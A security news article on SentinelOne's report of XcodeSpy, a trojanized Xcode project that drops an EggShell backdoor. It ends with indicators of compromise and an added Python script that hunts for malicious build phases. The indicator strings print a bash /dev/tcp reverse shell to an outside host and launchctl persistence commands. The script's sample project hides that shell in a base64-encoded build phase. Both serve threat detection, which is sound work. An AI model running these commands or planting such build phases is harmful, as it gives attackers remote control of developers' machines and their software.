Xcode Developers Targeted with EggShell Backdoor by XcodeSpy Malware
The malicious project installs a customized version of the EggShell backdoor on Apple developers’ computers, making way for data exfiltration and spying.
According to research published by SentinelOne, hackers are now targeting iOS developers with an EggShell backdoor that has worked its way into a shared Xcode project.
The company was alerted by an anonymous researcher that malicious code had been planted in a development project for Xcode, Apple’s integrated development environment (IDE) used to build software for macOS, iOS, iPadOS, watchOS, and tvOS.
We recently became aware of a trojanized Xcode project in the wild targeting iOS developers thanks to a tip from an anonymous researcher. The malicious project is a doctored version of a legitimate, open-source project available on GitHub. The project offers iOS developers several advanced features for animating the iOS Tab Bar based on user interaction.
The malicious Xcode project, dubbed XcodeSpy, installs a customized version of the EggShell backdoor on the developer’s macOS computer. The backdoor can record from the victim’s microphone and camera, log keystrokes, and upload and download files.
SentinelOne researchers note that malicious code planted in a shared Xcode project raises the question of whether the attackers are targeting developers in order to mount a supply chain attack through the software those developers build.
Supply chain attacks have concerned developers for a long time, and the concern has grown in recent months as the federal government and private sector respond to the SolarWinds incident, in which suspected Russian actors conducted a widespread espionage operation through a trojanized software update. That attack showed that no institution is too big to be breached and no organization is completely safe from a compromised update.
SentinelOne found two variants of the customized EggShell backdoor. Both contain a number of encrypted C2 URLs as well as encrypted strings for various file paths.
One encrypted string in particular is shared between the doctored Xcode project and the custom backdoors, tying them together as part of the same ‘XcodeSpy’ campaign, the researchers said.
Both backdoor samples were uploaded to the malware-sharing repository VirusTotal, in August and October 2020 respectively.
The later sample was also found in the wild in late 2020 on a victim’s Mac in the United States. For reasons of confidentiality, we are unable to provide further details about the ITW incident. However, the victim reported that they are repeatedly targeted by North Korean APT actors and the infection came to light as part of their regular threat hunting activities.
Although the motive behind the campaign is not yet known, the technique used to plant the EggShell backdoor in the Xcode project could just as well be reused against other projects and other developers.
To help threat hunters and developers detect such attacks, SentinelOne researchers provided a list of known indicators of compromise:
URLs & Resolving IPs
EggShell bins: */.update
SHA-256: 6d93a714dd008746569c0fbd00fadccbd5f15eef06b200a4e831df0dc8f3d05b
SHA-1: 556a2174398890e3d628aec0163a42a7b7fb8ffd
SHA-256: cdad080d2caa5ca75b658ad102987338b15c7430c6f51792304ef06281a7e134
SHA-1: 0ae9d61185f793c6d53e560e91265583675abeb6
Xcode proj: TabBarInteraction.zip
SHA-256: 1cfa154d0145c1fe059ffe61e7b295c16bbc0e0b0e707e7ad0b5f76c7d6b66d2
SHA-1: d65334d6c829955947f0ceb2258581c59cfd7dab
Strings:
killall %@;sleep 3;cp "%@" "%@";chmod +x "%@";"%@" %@ 1>/dev/null 2>/dev/null
if (! pgrep -x %@ >/dev/null);then cp "%@" "%@";chmod +x "%@";"%@";fi;
sleep 1;launchctl unload "%@" > /dev/null;launchctl load "%@" > /dev/null
launchctl unload "%@" 2>/dev/null; rm "%@"
echo mdbcmd > /private/tmp/.tag;bash&> /dev/tcp/www.cralev.me/443 0>&1 &
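As an added example (not SentinelOne's code and not anything taken from the XcodeSpy write-up), the following Python script turns the indicators above into a hunt. It scans an Xcode project.pbxproj for PBXShellScriptBuildPhase entries, decodes any long base64 blob found in a script body, and flags a phase when the raw or decoded text contains the bash /dev/tcp reverse-shell pattern, the /private/tmp/.tag marker, the mdbcmd string or the cralev.me host from the strings list, or a generic eval-of-decoded-data construct. It also checks a file's SHA-256 against the three hashes published above. The example assumes the payload is delivered through an obfuscated shell build phase; the sample pbxproj is constructed for the example, its object IDs are made up, and the obfuscated phase is built by base64-encoding the `echo mdbcmd ...` one-liner from the strings list.

```python
"""Hunt for XcodeSpy-style build-phase payloads and known IoC hashes.

Added example, not code from SentinelOne or the XcodeSpy write-up. Assumes
the backdoor is dropped by an obfuscated shell build phase; the sample
project at the bottom is constructed for this example.
"""
import base64
import binascii
import hashlib
import re
import sys

# SHA-256 hashes copied from the IoC list above (two EggShell bins, one zip).
KNOWN_SHA256 = {
    "6d93a714dd008746569c0fbd00fadccbd5f15eef06b200a4e831df0dc8f3d05b",
    "cdad080d2caa5ca75b658ad102987338b15c7430c6f51792304ef06281a7e134",
    "1cfa154d0145c1fe059ffe61e7b295c16bbc0e0b0e707e7ad0b5f76c7d6b66d2",
}

# Substrings from the strings list above plus generic patterns that a
# legitimate build script has no reason to contain.
INDICATORS = (
    "/dev/tcp/",          # bash built-in socket: reverse shell without nc/curl
    "/private/tmp/.tag",  # marker file written by the one-liner
    "mdbcmd",
    "www.cralev.me",
    "base64 -D",          # macOS spelling of the base64 decode flag
    "base64 -d",
    "eval ",              # executing decoded data
)

# shellScript = "..." inside a build phase; pbxproj escapes " as \" and
# newlines as \n, so the body is a run of non-quote chars or escapes.
SHELL_SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"')
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def _unescape_pbx(value):
    return value.replace('\\"', '"').replace("\\n", "\n").replace("\\t", "\t")


def decode_base64_blobs(script):
    """Return the text of every long base64 run in script that decodes cleanly."""
    decoded = []
    for blob in B64_BLOB_RE.findall(script):
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue
        text = raw.decode("utf-8", errors="replace")
        if all(c.isprintable() or c in "\n\t" for c in text):
            decoded.append(text)
    return decoded


def scan_pbxproj(text):
    """Flag each shell build phase whose raw or decoded body matches an indicator."""
    findings = []
    for match in SHELL_SCRIPT_RE.finditer(text):
        script = _unescape_pbx(match.group(1))
        decoded = decode_base64_blobs(script)
        views = [script] + decoded
        hits = sorted({ind for ind in INDICATORS if any(ind in v for v in views)})
        if hits:
            findings.append({"script": script, "decoded": decoded, "hits": hits})
    return findings


def is_known_ioc(data):
    """True when the SHA-256 of data matches a hash from the IoC list."""
    return hashlib.sha256(data).hexdigest() in KNOWN_SHA256


# Constructed sample (not a real project): a benign SwiftLint phase and a
# phase that evals a base64-decoded copy of the one-liner from the IoC
# strings. The 24-hex object IDs are made up.
DECODED_ONE_LINER = (
    "echo mdbcmd > /private/tmp/.tag;bash&> /dev/tcp/www.cralev.me/443 0>&1 &"
)
_B64 = base64.b64encode(DECODED_ONE_LINER.encode()).decode()
SAMPLE_PBXPROJ = f"""
\t\tAA0000000000000000000001 /* ShellScript */ = {{
\t\t\tisa = PBXShellScriptBuildPhase;
\t\t\tshellPath = /bin/sh;
\t\t\tshellScript = "if which swiftlint >/dev/null; then swiftlint; fi\\n";
\t\t}};
\t\tAA0000000000000000000002 /* ShellScript */ = {{
\t\t\tisa = PBXShellScriptBuildPhase;
\t\t\tshellPath = /bin/sh;
\t\t\tshellScript = "eval \\"$(echo '{_B64}' | base64 -D)\\"\\n";
\t\t}};
"""

if __name__ == "__main__":
    # Usage: python3 hunt_xcodespy.py [project.pbxproj ...]; no args scans the sample.
    targets = {p: open(p, encoding="utf-8", errors="replace").read() for p in sys.argv[1:]}
    for name, text in (targets or {"sample": SAMPLE_PBXPROJ}).items():
        for f in scan_pbxproj(text):
            print(f"{name}: suspicious build phase, indicators: {', '.join(f['hits'])}")
```

Running it with no arguments scans the constructed sample and reports only the obfuscated phase; pointing it at real `*.xcodeproj/project.pbxproj` files (for example over a checkout of third-party projects before opening them in Xcode) reports any phase that matches. `is_known_ioc` is meant for the dropped `.update` binaries and downloaded project archives: read the file bytes and compare against the published hashes before trusting either.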